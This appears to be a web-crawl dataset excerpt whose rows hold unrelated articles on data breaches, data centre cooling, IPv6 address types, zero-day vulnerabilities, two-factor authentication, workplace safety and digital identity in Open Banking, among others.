text
stringlengths 234
589k
| id
stringlengths 47
47
| dump
stringclasses 62
values | url
stringlengths 16
734
| date
stringlengths 20
20
⌀ | file_path
stringlengths 109
155
| language
stringclasses 1
value | language_score
float64 0.65
1
| token_count
int64 57
124k
| score
float64 2.52
4.91
| int_score
int64 3
5
|
---|---|---|---|---|---|---|---|---|---|---|
Today is “Data Privacy Day” – and while it seems like there is a day for nearly everything we hold dear (hello national grilled cheese day!), this particular date commemorates the 1981 signing of the first legally binding international treaty on data protection.
Data protection standards have come a long way since 1981, especially in the last couple of years with GDPR and CCPA – two regulations that extend the rights of individuals to better control and protect the use of their personal data in the evolving digital landscape. It’s generally believed that GDPR and CCPA are laying the foundation for further groundbreaking regulations.
And it makes sense. According to Business Insider, “of the 15 largest data breaches in history, 10 took place in the past decade.” These breaches collectively resulted in the loss of nearly 4 billion records. So, as we embark on a new decade, let’s take a look at some of the data breaches of the 2010s that helped shape stricter consumer data protection.
Uber Breach – While it was disclosed in 2017, Uber suffered a breach in 2016 that exposed personal information belonging to 57 million drivers and customers. Attackers stole names, email addresses and phone numbers and demanded a $100,000 ransom. To add insult to injury, Uber also was fined nearly $150 million for not disclosing the breach earlier.
Lesson Learned? Don’t store code in a publicly accessible database. Uber data was exposed because the AWS access keys were embedded in code that was stored in an enterprise code repository by a third-party contractor.
Equifax Breach – Several tech failures in tandem – including a misconfigured device scanning encrypted traffic and an automatic scan that failed to identify a vulnerable version of Apache Struts – ultimately led to a breach that impacted 145 million customers in the US and 10 million UK citizens.
Lesson Learned? Get security basics right. Despite cyber attacks becoming more targeted and damaging, organizations are frequently still ignoring the security basics. Patches need to be applied promptly and security certificates need to be maintained. This breach also inspired elected officials to push for legislation to tighten regulations on what protections are required for consumer data and influenced an increase in executive accountability.
Facebook’s Cambridge Analytica Breach – Cambridge Analytica, a British political consulting firm, harvested the personal data from millions of peoples’ Facebook profiles without their consent and used it for political advertising purposes. The scandal finally erupted in March 2018 when a whistle blower brought this to light and Facebook was fined £500,000 (US$663,000), which was the maximum fine allowed at the time of the breach.
Lesson Learned? Protect user data (or pay up). Lawmakers claim Facebook “contravened the law by failing to safeguard people’s information” – and suffered the consequences. Now the United States Congress is placing additional pressure on Facebook to stop the spread of fake news, foreign interference in elections and hate speech (or risk additional, larger fines).
Ecuador Breach – Data on approximately 17 million Ecuadorian citizens was exposed due to a vulnerability on an unsecured AWS Elasticsearch server where Ecuador stores some of its data. While the sheer scale of this breach made it headlines news, the breadth of exposed information really made everyone stand up and take notice. Exposed files included official government ID numbers, phone numbers, family records, marriage dates, education histories and work records. In addition, a similar Elasticsearch server exposed the voter records of approximately 14.3 million people in Chile, around 80% of its population.
Lesson Learned? Adhere to the shared responsibility model. Most cloud providers operate under a shared responsibility model, where the provider handles security up to a point and, beyond that, it becomes the responsibility of the customer. As more and more government agencies look to the cloud to help them become more agile and better serve their citizens, it’s vital they continue to evolve their cloud security strategies to proactively protect against emerging threats – and reinforce trust among the citizens who rely on their services.
Desjardins Breach — The data breach that leaked info on 2.9 million members wasn’t the result of an outside cyber attacker, but a malicious insider – someone within the company’s IT department who decided to go rogue and steal protected personal information from his employer.
Lesson Learned? Be proactive in identifying unusual or unauthorized behavior. While insider threats can be more difficult to identify, especially in a case where the user has legitimate privileged access rights, it’s important to be able to consistently monitor for unusual and unauthorized activities. Even more critical is the ability to automatically remediate potentially risky behavior (think: putting a temporary hold on permissions) to help reduce the amount of time it takes to stop an attack and minimize data exposure. This breach showed that a defense-in-depth security strategy that includes privileged access management, multi factor authentication and database activity monitoring has never been more crucial.
These incidents are just a small sample of the numerous data breaches that occurred in the 2010s. Any organization that collects or stores customer information can learn from these incidents and the many more like them. Not prioritizing data protection or simply doing the bare minimum can lead to regulatory non-compliance fines, or worse – the destruction of customer confidence and brand damage. Listening to the lessons of the past can help us prepare for a more secure future.
|
<urn:uuid:05ee7a03-6b62-4eb6-9024-4d6994930881>
|
CC-MAIN-2022-40
|
https://www.cyberark.com/resources/public-sector-government/data-privacy-day-data-protection-lessons-from-the-2010s
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00246.warc.gz
|
en
| 0.944885 | 1,107 | 2.96875 | 3 |
Efficient and effective data centre cooling technologies boost sustainability
Digital services have rapidly become the backbone of any business. Nowadays, businesses rely on computing resources such as searches, data transfer, SQL queries and delivery of computing services to sustain, grow and improve customer experience. Millions of business customers are performing these tasks all over the world, and in some cases at the same time. With all these IT servers’ requirements, a considerable amount of power is required, and the heat that is produced in this case is huge. To get the perspective as far as the amount of heat that is generated in the process is concerned, think about your computer when you work; the components can get extremely hot that you can’t touch them, therefore you need internal fans to disperse the heat constantly. When you talk about the numerous server rooms with stacks of aisles and aisles of machines, then the heating problem becomes significant.
How to cool the servers effectively
To function optimally, servers need to be cooled at all times. Failure to manage airflow and heat in a data centre can lead to disastrous effects. As per definition, a cooling system regulates a number of parameters in a modern data centre such as temperature, energy use, cooling performance, and fluid flow characteristics, leading to the achievement of maximum efficiency.
- With proper and effective cooling technologies, equipment in a data centre will stay online. Overheating can damage the servers leading to knock-on effects for the data centre itself and business customers.
- While data may not travel faster in cooler rooms, it travels faster than it would over crashed servers. Since data centres can develop some hot spots, coming up with a new solution can be done efficiently. Using efficient cooling technologies can efficiently change the way cold air is utilised in the data centres. Overall, this enables greater efficiency in scaling up a data centre.
- Data centre equipment that constantly overheats normally fails before they get to its expected end of life. Therefore, having an efficient data cooling technology such as liquid immersion starts paying off immediately. Your hardware submerged in a dielectric liquid will last longer and with this, the business will spend a relatively less amount when it comes to the replacement of infrastructure, it’s predicted to be up 40% longer. With this incentive, a business should strive to move towards green IT solutions rather than increasing electronic waste which comes with the constant replacement of data centre infrastructure.
Data centre cooling concerns
Data centre cooling brings some significant impact on the planet and therefore business. First, the cost of cooling infrastructure (air-conditioning units, condensers, compressors, evaporators, and humidifiers) installation can be quite prohibitive. Secondly, the amount of energy needed to run these units and IT servers is enormous. It means that businesses have to spend a considerable amount to cater to the power bills. Also, the fact that most of the power is generated using non-fossil fuels, means increased demand for energy and increases the carbon footprint of the IT systems.
However, there is hope. Tackling the energy and cooling requirements of a data centre can be addressed by the adoption of renewable energy coupled with efficient data centre cooling technologies such as liquid immersion cooling.
Data centre cooling is an important component in digital transformation. When done effectively, it significantly reduces the IT sector’s carbon footprint. Businesses should use effective cooling technologies to ensure the sustainable use of digital services.
|
<urn:uuid:7304cc6d-46ae-4782-a623-68c6fe609966>
|
CC-MAIN-2022-40
|
https://peasoup.cloud/iaas/efficient-and-effective-data-centre-cooling-technologies-boost-sustainability/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00246.warc.gz
|
en
| 0.923963 | 702 | 2.59375 | 3 |
A new tech from Purdue U. and Indiana University School of Medicine will guide docs with AR instructions.
Scientists working together at Purdue University and the Indiana University School of Medicine have come up with a new augmented reality based technology designed to assist military surgeons to complete vital procedures on the battlefield.
The tech will offer them guidance through both visual and audio assistance from remote specialists.
The idea is to use more than just verbal instructions when these military surgeons are coping with challenging trauma cases. While there are already systems in existence that give physicians located far away the ability to mark up video that is sent to him or her from a surgeon who is already working on a patient, there are some drawbacks to the current method. For example, though the video is from the perspective of the surgeon actually conducting the procedure, the notes from the assisting remote surgeon are displayed on a monitor nearby. This requires the surgeon to continually look away from the patient and the screen where the instructions are being shown. This new augmented reality based technology could change that.
The System for Telementoring with Augmented Reality (STAR) displays the information before the surgeon’s eyes.
It provides more than notes made on a video screen. Instead, it offers a more natural way of sharing information between two doctors who are on different parts of the planet. This allows them to use the overlay of AR technology to display notes or indicate specific positions on the patient that indicates particular points on the anatomy so that the surgeon is seeing it over his or her reality instead of on a screen.
This augmented reality technology offers a few different visual recognition algorithms in order to make sure that the text remains stable above the applicable locations, even if the surgeon changes his or her view away from the field of view where the text applies. This system uses transparent overlay on top of the working field so that a remote surgeon can point things out and add text right in front of the surgeon’s eyes without ever requiring the surgeon to look away from what he or she is doing.
|
<urn:uuid:3b706db3-4ffe-4863-9d4b-f7ffe81addfb>
|
CC-MAIN-2022-40
|
https://www.mobilecommercepress.com/tag/augmented-reality-military/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00246.warc.gz
|
en
| 0.94694 | 406 | 3.203125 | 3 |
NSA Day of Cyber
October 29, 2015
STEM education has become a national priority and the explosive growth of the cyber-related careers is creating an unprecedented opportunity for our future generation. With 100,000’s of cyber jobs currently open in banking, mobility, healthcare and government, cyber is one of the fastest growing STEM career fields. Education leaders are focused on how to bring cyber into their classrooms to connect these opportunities to their students.
The NSA Day of Cyber is designed to raise the “national IQ” for STEM and CyberScience education paths. NSA is sponsoring the program to introduce and inspire the more than 40 million students in schools and colleges to pursue STEM careers to build the skills that will open up their future and connect them to this in-demand digital workforce.
The NSA Day of Cyber is a web-based, self-paced, interactive experience that enables students to test drive their future in Cybersecurity by experiencing a day in the life of six NSA cybersecurity leaders.
This online experience is free to students, teachers, schools and organizations in the United States.
|
<urn:uuid:6316efaa-edb3-4dc0-a01e-aeba701cc662>
|
CC-MAIN-2022-40
|
https://bdpatoday.com/2015/10/25/nsa-day-of-cyber-10-29-15/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335326.48/warc/CC-MAIN-20220929065206-20220929095206-00246.warc.gz
|
en
| 0.960511 | 219 | 2.625 | 3 |
v6 Vertex – A Brief Explanation of IPv6 Address Types
ITdojo’s v6 Vertex is an ever-expanding set of quick tips and useful advice for using IPv6 in your network.
People who have been using IPv4 for some time know that there are three basic address types that are commonly discussed: unicast, broadcast and multicast.
When it comes to address types IPv6 offers us some of what we already know and then takes things a step further. In this article I offer a quick, concise explanation of each IPv6 address type.
IPv6 Address Type #1: Unicast
The concept of a unicast in IPv6 is unchanged compared to what you already know in IPv4. A unicast address in either protocol is used for one-to-one communication. In theory, a unicast IP address represents one and only one destination (yes, there are exceptions). Put simply, when you want to get some traffic to a specific node (and only that specific node) you sent it to that node’s unicast IP address. Again, this is true in IPv4 and in IPv6.
Address Type #2: Multicast
The core concept of a multicast IPv6 address is the same as it was in IPv4. The devil is in the details, though. A lot of thought went into IPv6 multicasting and it has an impressive role in the inner-workings of the protocol. A multicast, which is generically defined as “one-to-many” communications is when a node send traffic to a multicast IP address rather than to a unicast IP address. The traffic is delivered to as few and zero and as many as all nodes in an internetwork. The reality is that it is sent to some number in between. If you know multicasting (even a little bit) in IPv4, you are on a solid foundation to learn how multicasting works in IPv6. Despite having an expanded role in the new protocol, a multicast is still just a multicast.
Address Type #3: Anycast
I was just as surprised as a lot of people to learn that anycast IP addresses, which I heard about for the first time when I started leaning about IPv6 waaaaaaaaaayyyy back in 1999, are not new. They have quietly existed in IPv4 for a long time, too. They just never got any real publicity. An anycast IP address is the “closest one of many”. This means that many nodes will be configured with the same anycast IP address and your traffic will be sent to the one that is closest to you (from a routing protocol metric perspective). This is pretty exciting stuff. The first thing it does is create an opportunity to eliminate lists of failover servers for certain services. DNS is at the top of the list for this discussion. Many nodes in today’s networks are configured with multiple DNS server IP addresses. The node always sends queries to the first on the list and only goes to the next DNS server on the list if the first doesn’t respond in a timely fashion. The most important base word in that last sentence was ‘time’. It takes time for the failover to occur which diminishes the ‘user experience’. By having all of your DNS servers have the same anycast IP address (which they have IN ADDITION TO their unicast IP address) you can configure your nodes with one DNS server IP address (the anycast address). Now, when nodes query the server their packets are forwarded to the closest (from the router’s perspective) node with that address. Assuming all the DNS servers have the same capabilities (zone files, recursion capabilities, etc.) the user will get the service they need without ever having to fail over to another server. Well, in the eyes of the node, at least. This has the promise of producing very seamless and transparent services for users. There are details that I’m overlooking (this is supposed to be brief), of course. But the opportunities for anycasting in IPv6 are pretty cool. Note: The f-root name server on the Internet is an anycast IPv4 (yes, IPv4) address. It is also available via an IPv6 anycast address, too.
Did you notice that I never mentioned broadcasts? Broadcasts as you know them in IPv4 are gone in IPv6. You can, however, still reach all nodes. The functionality of a broadcast has been absorbed (quite correctly) into multicasting. We now have an all-nodes multicast address (achieves pretty much the same thing as a broadcast), an all-routers multicast address, an all-DHCP servers multicast, etc. Rather than broadcasting for a DHCP server like you did in IPv4 you now multicast for one. A partial list of well-known multicast IPv6 addresses can be seen here.
|
<urn:uuid:c7f57092-690a-4846-92c3-80a86d93b0e1>
|
CC-MAIN-2022-40
|
https://www.itdojo.com/itdojos-v6-vertex-4-a-brief-explanation-of-ipv6-address-types/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00246.warc.gz
|
en
| 0.952286 | 1,035 | 3 | 3 |
Quantum Computing One of the ’12 Dark Secrets of Encryption’
(CIO.com) Encryption is fast becoming developer’s go-to solution for whatever data privacy or security. Contributing Editor Peter Wayner cautions that encryption has it limits and the tricky thing with encryption is that it can be impossible to be certain where those limits are.
Wayner posits “12 Dark Secrets of Encryption, with quantum computing holding one of the secrets. Quantum is a secret Wayner says because “The future of computing is a mystery.”
“No one knows if quantum computers will ever be built with enough power to tackle meaningful problems, but we know people are trying and putting out press releases about making progress. We also know that if the quantum machines appear, some encryption algorithms will break right open. Many encryption scientists are working hard at building new algorithms that can resist quantum computers, but no one really knows the extent of a quantum computer’s powers. Will it be limited to the known algorithms? Or will someone find another way of using the quantum computer to break all of the new algorithms.”
Wayner’s provocative article worth a read of the other 11 dark secrets.
|
<urn:uuid:b1a98bb8-a38a-4138-a81e-a192cb79be80>
|
CC-MAIN-2022-40
|
https://www.insidequantumtechnology.com/news-archive/quantum-computing-one-12-dark-secrets-encryption/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337404.30/warc/CC-MAIN-20221003070342-20221003100342-00246.warc.gz
|
en
| 0.91437 | 253 | 2.71875 | 3 |
Two Factor Authentication
Social engineering or basically tricking someone in to giving you their password is one of the most common methods of cybercrime. This if often done by sending a familiar looking email (e.g., from Bank of America) with a link in it that the user inadvertently clicks on and types in their password. Do this and the bad guys have you, right? Well not necessary. Increasingly websites require users to utilize two factor authentication which will prevent this nightmare scenario.
I find the simplest definition of two factor authentication to be “something you know and something you own”. A password is clearly “something you know” (assuming you don’t forget it) and the second factor is “something you own”. This must be something physical that is only in your possession and nearly impossible for someone else to emulate. In the past this was often a digital fob or token—a dedicated piece of hardware that would generate a random code. Now a days, however, those are a relic of the past and the preferred “something you own” is a cell phone. Almost everyone has the experience of a website texting you a code that you have to enter to authenticate. That is our modern-day version of two factor authentication.
If you want to learn more about how Accolade Technology can help your business, please contact us at [email protected].
|
<urn:uuid:7e10b047-e2ac-4780-bcbd-114e61a00518>
|
CC-MAIN-2022-40
|
https://accoladetechnology.com/two-factor-authentication/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337516.13/warc/CC-MAIN-20221004152839-20221004182839-00246.warc.gz
|
en
| 0.952079 | 293 | 3.203125 | 3 |
How can complacency harm our safety?
EHS safety expert and Head of Marketing for SafeStart International, Lucas Martinucci offers tips on how to not let complacency badly affect our daily lives on and off the workplace.
Before we start, it is important for you to understand what complacency is. So what is complacency? Complacency gives you a false sense of security/safety or confidence. It makes you let your guard down even around potential danger. We all become complacent with the hazards we have to deal with on a day to day basis. Once you get used to the way things are, it’s hard to treat the hazards with the same fear, apprehension and respect you did initially. Once things seem normal to you it’s easy enough for anybody’s mind to wander.
To give you an example, we all have picked up our cell phone while driving or texted while crossing a street despite knowing that it could potentially be dangerous. Even though we have come across fatalities and accidents that have happened to people while they were texting or calling, we have done it again and again. Why? Because “nothing has ever happened before” to us or to anyone that is close to us. This is complacency.
“More than 90% of accidents that happen, whether at work, at home or on the road, can be avoided. Complacency, or as we usually explain as overconfidence, is one of the main causes of accidents, but still, it is a state very difficult to recognize because we think we are safe doing something that we are used to do on a daily basis”, explains Lucas Martinucci, Safety specialist and Head of Marketing at SafeStart International.
“Safety is ‘at risk’ when we reduce our perception of danger, when we deviate our behaviour, take short-cuts or do not follow the rules because ‘it never went wrong’ or ‘I’ve always done it that way’. Also, when we believe that we don’t need to improve, because we are already good enough at what we do, we let our guard down making us more susceptible to silly mistakes”, adds Martinucci.
Lucas offers some tips on how to avoid being complacent:
Turn off the autopilot mode! When you feel that complacency is slowly creeping in, improve your habits, keep your eyes on task and look at others for the patterns that increase the risk of injury. This will help you to not repeat the same behaviours and errors;
Rate your State! It is very important to be aware that we do not know everything and we are not superheroes. Do a self-analysis: How am I feeling today? What errors do I really make everyday? What errors are real risks to my life and what can I do to avoid them?;
Anticipate your next moves to avoid possible errors! This should become a habit in everyone’s life – stay alert when you go on with your day, in traffic, at work, in public places. Excessive zeal is never harmful;
And finally, ask for help! “When I saw that I was picking up my cell phone a lot while driving, I asked my wife and kids to warn me or even yell at me. Everything is easier with a bit of help. Do the same with your family, co-workers, friends,” says Lucas.
SafeStart is a leader in advanced safety awareness training with presence in more than 60 countries, having trained more than 4 million people in over 3,500 companies. The training is available in more than 30 languages and has been implemented in more than 60 countries. The focus of the training is to develop specific skills to reduce errors, injuries and incidents that happen daily and involve human factors. Among the companies that implemented the programme are: Komatsu, Mosaic, Saint Gobain, DSM, Epiroc, Etex, Heineken, Michelin, Outokumpu.
|
<urn:uuid:ce9bf8de-21d9-4483-aa8b-b8600a230d3d>
|
CC-MAIN-2022-40
|
https://www.isrmag.com/how-can-complacency-harm-our-safety/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00246.warc.gz
|
en
| 0.954617 | 835 | 2.703125 | 3 |
You may not think twice about the software you use to run your computers and devices, but behind the interface is highly complex code that may have taken a large team of developers years to write and finetune. Despite their best efforts, developers can miss software flaws. While some flaws only affect user experience, others are far more serious.
A zero-day flaw is any software vulnerability exploitable by hackers that doesn't have a patch yet. The software developers may either not know of the weakness, are developing a fix for it, or are ignoring it. As you can imagine, such a vulnerability can result in a critical cybersecurity breach.
Why is it called zero-day?
Many people want to know why experts call this type of computer exploit a zero-day vulnerability rather than anything else. Admittedly, there’s a bit of sarcasm behind the name. People in the computing world refer to it as a zero-day attack — because the software creators have zero days to respond after hackers have taken advantage of it. It’s sort of like shutting the barn door after the wolf has already been inside. Sure, you can prevent future attacks, but that's of little comfort to the missing sheep.
After the zero-day vulnerability is made public, it’s no longer a zero-day flaw — it’s just a vulnerability. Usually, manufacturers will burn the midnight oil to develop a patch to fix the weakness as soon as they know about it.
How are zero-day bugs discovered?
With manufacturers working overtime to minimize vulnerabilities, you'll notice your software updates pretty regularly. Sometimes security updates even release on the same day as the software debuts. While developers like to find security holes internally, they also don’t mind some outside help.
White hat hackers
White hat hacker is an archaic term for an ethical hacker. Companies hire such specialists to enhance network security. Identifying potential zero-day bugs can be part of the job.
Grey hat hackers
Grey hat hackers are like white hats, except they're not working in an official capacity. Such hackers may try to find zero-day bugs in hopes of landing a job with the company, gaining notoriety, or just for entertainment. A grey hat hacker never takes advantage of any flaws they discover. An example is when a hacker exploited a vulnerability in the cryptocurrency platform Poly Network to take $600 million worth of tokens before returning the sum.
Many software companies host hacking events and pay hackers cash and prizes for finding exploits. Here, hackers find flaws in operating systems, web browsers, and apps for mobile devices and computers. A recent and example of this is when two Dutch security specialists took home $200,000 for a Zoom zero-day discovery at Pwn2Own.
Researchers from cybersecurity companies like Malwarebytes look for exploits as part of their job. When researchers find an exploit before cybercriminals, they usually report it to the manufacturers before making it public. By giving manufacturers a head start, researchers can minimize the chances of hackers launching zero-day attacks.
How are zero-day attacks discovered?
A software user realizes that they’re the target of a zero-day attack when their system behaves unusually or when a hacker uses the exploit to drop threatening malware like ransomware. Researchers can also uncover a zero-day attack after an event. For example, after the state-sponsored Stuxnet attack on Iran, researchers worldwide realized it was a zero-day worm attack. Sometimes, a zero-day attack is recognized by a manufacturer after a client reports unusual activity.
Are zero-day attacks common?
Zero-day attacks like the Stuxnet worm strike have specific targets and don’t affect regular computer users. Meanwhile, reputable companies like Microsoft, Apple, and Google, usually fix zero-days as soon as possible to protect their reputations and their users. Often, a fix is out before the average user is affected. Still, zero-days shouldn’t be taken lightly because their impact can be seriously damaging.
How does a zero-day attack happen?
- Identification: Hackers find unreported vulnerabilities in software through testing or by shopping on black markets in the underbelly of the Internet like the Dark Web.
- Creation: Threat actors create kits, scripts, or processes that can exploit the newly found vulnerabilities.
- Intelligence: The attackers already have a target in mind or use tools like bots, probing, or scanners to find profitable targets with exploitable systems.
- Planning: Hackers gauge the strength and weaknesses of their target before launching an attack. They may use social engineering, spies, or any other tactic to infiltrate a system.
- Execution: With everything in place, the attackers deploy their malicious software and exploit the vulnerability.
How to mitigate zero-day attacks
Stopping attackers from exploiting unknown vulnerabilities to breach your system is undoubtedly challenging. It’s critical to close threat vectors that a threat actor can use to infiltrate your network with layers of protections and safer practices. Here are some tips that may help you detect and prevent unknown threats:
- Don’t use old software. Hackers can more easily create exploits for software that the vendor no longer supports.
- Use advanced antivirus tools that feature machine learning, behavioral detection, and exploit mitigation. Such features can help your cybersecurity tools stop threats with unknown signatures.
- In companies:
- Train employees to identify social engineering attacks like spear-phishing that hackers can use as an attack vector.
- Adopt Endpoint Detection and Response (EDR) solutions to monitor and secure your endpoints.
- Enhance network security with firewalls, private VPNs, and IPsec.
- Segment your networks with robust network access controls.
News on zero-days
- Log4j zero-day “Log4Shell” arrives just in time to ruin your weekend
- Windows Installer vulnerability becomes actively exploited zero-day
- Patch now! FatPipe VPN zero-day actively exploited
- Patch now! Microsoft plugs actively exploited zero-days and other updates
- Google patches zero-day vulnerability, and others, in Android
- Patch now! Apache fixes zero-day vulnerability in HTTP Server
- Update now! Google Chrome fixes two in-the-wild zero-days
- Apple releases emergency update: Patch, but don’t panic
- HiveNightmare zero-day lets anyone be SYSTEM on Windows 10 and 11
- PrintNightmare 0-day can be used to take over Windows domain controllers
- Microsoft fixes seven zero-days, including two PuzzleMaker targets, Google fixes serious Android flaw
- Zoom zero-day discovery makes calls safer, hackers $200,000 richer
|
<urn:uuid:2f290230-c4fe-49d4-a917-cc5a5a919fe3>
|
CC-MAIN-2022-40
|
https://www.malwarebytes.com/zero-day
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00246.warc.gz
|
en
| 0.921818 | 1,386 | 3.140625 | 3 |
Digital identity is data about you: who you are, what you’ve agreed to, and who you trust. Some people even argue that your digital identity includes everything you say and do online. According to our guest, Nat Sakimura, this isn’t far from the truth.
Nat is considered one of the foremost global experts on the subjects of identity and privacy. He’s known for his work at both the OpenID Foundation as chairman of the board and the Nomura Research Institute as an identity and privacy standardization architect.
In his over 30-year career, Nat has penned some of the world’s most widely used open data standards and strives to help communities understand and organize themselves around innovative ideas of identity and privacy.
What is digital identity?
For Nat, the essence of digital identity is a set of attributes about any entity. When this entity is a living, breathing human being, that identity is also known as personal data.
“As long as it is actual data that can be linked back to a single individual, we treat it as personal data.”
Some would say “personal data” is a bit of an oxymoron. They feel that it inherently wants to be free and there is no such thing as personal data at all.
Nat argues that those perceptions of data are viewing “personal” as something possessive. In reality, personal data is simply data that can be linked back to a person in any way.
Interestingly, Nat uses the term “linked back to” as opposed to “owned.” A lot of dialogue around personal data comes back to this word: ownership. However, Nat says that data cannot legally be owned. You can’t establish a property rights type of ownership over information, because it can be copied.
This is where a dichotomy comes into play. The difference between data and property is that the more you copy and paste data, the more valuable it becomes. Unlike property, which is gone once you use it.
Our structures of laws and rights are built around this zero-sum structure. For example, we can’t both own a piece of land or a piece of property. But when it comes to data, it isn’t that simple. Nat explains:
“It’s more like copyright. So, you have copyright, and you have economic rights around it, as well. And the music, for example, can be copied many times. But the value of the music itself doesn’t diminish.”
Since your personal data is linked to you, you should have certain rights. This includes an economic right to any value generated by that data, just like an author or songwriter would have economic rights to the data they’ve created. However, at the heart of all the data, we create every day remains this core of identity.
OpenID’s identity layer
Nat has spent decades trying to solve the difficult problem of how best to maintain an identity in a digital world. He and his colleagues at the OpenID Foundation are creating a new layer of the Internet — an identity layer — which will underpin all of our digital identities well into the future.
“It’s a technical facility which allows an individual, as well as corporations and governments, to manage how their attributes are being transferred or expressed to another party.”
Since our personal data is distributed all through the internet, the OpenID protocol gives us a way to bring it all back together under one common identity and create a single view of our distributed data.
This is where Open Banking comes in. The fact is, we rightly expect a certain degree of protection when it comes to our money. That’s why the standards created by the OpenID Foundation are so crucial to Open Banking efforts around the world, defining how customers are identified and how they agree to securely share their financial data.
Within the OpenID Foundation is the Financial Grade API (FAPI). This group is working on the high-level security protocols for identity transactions. Today, FAPI is being adopted as a de facto security standard in the open banking world, specifically in places like the UK and Australia. The bottom of the security stack is the base on which OpenID is built: OAuth 2.0. Nat explains:
“OAuth 2.0 is a framework that allows you to delegate access to an API. It’s like creating a special purpose key for the safe so that a person can only perform that action.”
The next layer in the security stack is OpenID Connect. It builds on OAuth 2.0 to create a protocol that allows a party to express who the user is to the other party.
The layer above OpenID Connect is FAPI. OpenID Connect provides various levels of security, but elaborate security measures can become overkill for most consumers. FAPI constrains all of those measures to the option that can support the highest security scenario.
Recently, another layer was added to the stack called Client Initiated Backchannel Authentication (CIBA). This layer deals with cases where the user is not online directly.
Between all of these technologies, OpenID offers a way to authorize and authenticate in a distributed manner. No matter the service being used, it’s always adopting the same standards and mechanisms. Plus, those mechanisms are secure.
The efforts of the OpenID Foundation have become critical to the success of Open Banking around the world. The stack we explored, made up of OAuth 2.0, OpenID Connect, FAPI, and CIBA, is now the gold standard for Open Banking readiness, putting Nat and his team right at the center of the action.
With these standards, banks can build powerful ways to track consent, using well-defined technical constructs like claims and grants to manage securely who has agreed to share what data with whom.
Standardizing digital identity
How is identity to be managed in such a fragmented and distributed way? Realistically, the world is still figuring that out, like banks, governments, and giant tech companies all vie to become your favorite, and perhaps only, identity provider.
If you look around the world, different countries are taking different approaches to this question of managing identities for their populations. Nat feels that moving to national identity schemes won’t protect people from privacy invasions.
“The privacy violation comes from the use of the data. Just replacing the privately run identities system with a government-run identity system doesn’t change the situation. In some cases, many people fear that having too much data accumulated makes the government even more dangerous than having that data in a private company.”
That is certainly the case in many places. People trust their governments even less than they trust social media networks. Unfortunately, the current situation feels like a choice between trusting our government with our identities or trusting social media giants and other private digital providers with our identities.
Nat suggests that standardizing digital identity can ensure identity providers all operate on the same interface. That way, it will cost less. But what does this mean in the context of Open Banking?
Open Banking and digital identity
One of the advantages of cash is its ability to support anonymous transactions. Many of those who lament Open Banking worry that the government or the corporation is going to see all of their banking activity. They want their transactions to remain anonymous.
Nat says there is a way to maintain the anonymity of cash in a digital world. You can use a wallet system that holds anonymous digital money. However, if you lose that device, just like if you lost cash, the money is gone.
Regardless, Nat sees Open Banking as an effective lever to help drive adoption and education of identity management and consent management. He explains:
“Whether you like it or not, if you start using the banking services in the Open Banking context, you will be exposed to that framework and people will learn to think in concrete actions much better than in the abstract.”
And if you still trust no one, there are more solutions. Take self-sovereign identity, for example. Nat explains:
“Self-sovereign identity is a concept which allows you to maintain your internet identity that is created by yourself and will not be thus revoked by any party.”
It almost seems like everyone should move towards some form of self-sovereign identity. However, Nat says the important thing to remember is that you are still not the authoritative source of your data. Other parties can retain control over your data.
Nat says you might have to doubt if your own name even belongs to you. In reality, the government is the authoritative source of your name. This can make it feel like identity diffuses into almost nothing. Nat sees it in another way.
“Identity is not diffusing. Identity is a constant, which can only be instantiated with a relationship and with a point in time. Identity is an abstract notion, which only gets embodied in a particular context.”
Digital identity is key to making Open Banking work
Who are you? What makes you, well, you? Capturing our digital identity — the official expression of who we are online — demands that we claim certain data as our own, while still being able to share it with others.
Meeting this seemingly impossible challenge is the work of the OpenID Foundation. The standards they create, including OpenID Connect, FAPI, and CIBA, help answer these philosophical questions in a way that code can understand.
Using their technical constructs of grants and claims, we can begin to capture the consent to share data in a strong, reliable, and meaningful way.
No group has embraced these new standards more so than the global Open Banking community. The reason is clear: Open Banking is wholly dependent on digital identity.
Without some mechanism to track and verify people’s identity, the whole notion of a common, Open Banking ecosystem falls apart. At the same time, digital identity efforts are useless without something practical for them to do. The truth is, Open Banking and digital identity need each other to succeed.
Real or fake?
But is identity even real? Is it a specific thing that you can point to? According to Nat, not really.
Identity only becomes visible under the lens of a particular context. Your identity towards your family, your bank, and your government are all different. Yet, all are valid and all are real. Your identity belongs to you, but can only be seen through the eyes of others. How this comes to be in the digital world remains a work in progress.
Listen to the full podcast episode and subscribe via your favorite player.
Visit Mr. Open Banking @ http://mropenbanking.com.
If you missed the first season of the podcast, discover it here.
|
<urn:uuid:561dcef6-0f5e-46df-930c-d2fd75b4b670>
|
CC-MAIN-2022-40
|
https://blog.axway.com/product-insights/open-banking/mr-open-banking-with-nat-sakimura
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00446.warc.gz
|
en
| 0.949661 | 2,247 | 2.609375 | 3 |
The hype around deep learning
Deep learning is all the rage today, as companies across industries seek to use advanced computational techniques to find useful information hidden across huge swaths of data. While the field of artificial intelligence is decades old, breakthroughs in the field of artificial neural networks are driving the explosion of deep learning.
Decade old ideas now work
